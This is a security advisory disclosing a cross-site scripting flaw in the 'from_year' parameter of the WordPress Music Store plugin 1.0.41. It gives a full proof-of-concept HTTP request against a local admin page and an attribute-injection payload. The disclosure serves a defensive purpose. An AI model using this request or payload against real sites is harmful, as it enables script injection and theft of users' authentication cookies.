WordPress Music Store plugin version 1.0.41 suffers from a cross site scripting vulnerability.
988d284d6c1d709b5bfdd283880cfa6381231da2fee67fe96e8305120928fdf6
Product: Music Store
Exploit Author: Sachin Wagh
Version: 1.0.41
Home page Link: https://wordpress.org/plugins/music-store/
============================================================================
Details :
The Music Store plugin for WordPress is prone to a cross-site
scripting vulnerability because it fails to sufficiently sanitize
user-supplied input.
An attacker may leverage this issue to execute arbitrary script code
in the browser of an unsuspecting user in the context of the affected
site. This may allow the attacker to steal cookie-based authentication
credentials and to launch other attacks.
============================================================================
Burp Request:
1. Proof-Of-Concept :
POST /wordpress-4.4/wordpress/wp-admin/admin.php?page=music-store-menu-reports
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0)
Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost/wordpress-4.4/wordpress/wp-admin/admin.php?page=music-store-menu-reports
Cookie: wp-saving-post=18-check;
wordpress_9053f69aa70f4fc50a08aff40972c70e=root%7C1459164003%7C8NsS5J4PwMYZTzHDuAbfvQ2h2HDU1VyqBXKs06Sp6su%7C0f9809ce5d3668f89081468b6469a0e2faba16bb45fc7f4e58093dcb4c177eb3;
wp-settings-time-1=1458990477;
wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do%26posts_list_mode%3Dexcerpt%26uploader%3D1%26widgets_access%3Doff;
wordpress_logged_in_9053f69aa70f4fc50a08aff40972c70e=root%7C1459164003%7C8NsS5J4PwMYZTzHDuAbfvQ2h2HDU1VyqBXKs06Sp6su%7Cbf41351ac164baa54a3ee4303eb4fd9d715d5a7a90f1f4cbdcba4e0423ee75b4;
security_level=0; _ga=GA1.1.1331075502.1458634204;
PHPSESSID=4gaqfar5bmtmrnpana3a6crff6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 285
ms_purchase_stats=a01e6a42f2&_wp_http_referer=%2Fwordpress-4.4%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dmusic-store-menu-reports&tab=reports&buyer=Sachin&from_day=26&from_month=03&from_year=XSS&to_day=26&to_month=03&to_year=2017&group_by=no_group&to_display=sales&list_purchases=all
2. Payload : " onmouseover=prompt(1) "
============================================================================
Vulnerable Product: [+] Music Store 1.0.41
Vulnerable Parameter(s): [+] from_year
============================================================================
Affected Area(s): [+]
https://localhost/wordpress-4.4/wordpress/wp-admin/admin.php?page=music-store-menu-reports
============================================================================
Credits & Authors :
Sachin Wagh (@tiger_tigerboy)
============================================================================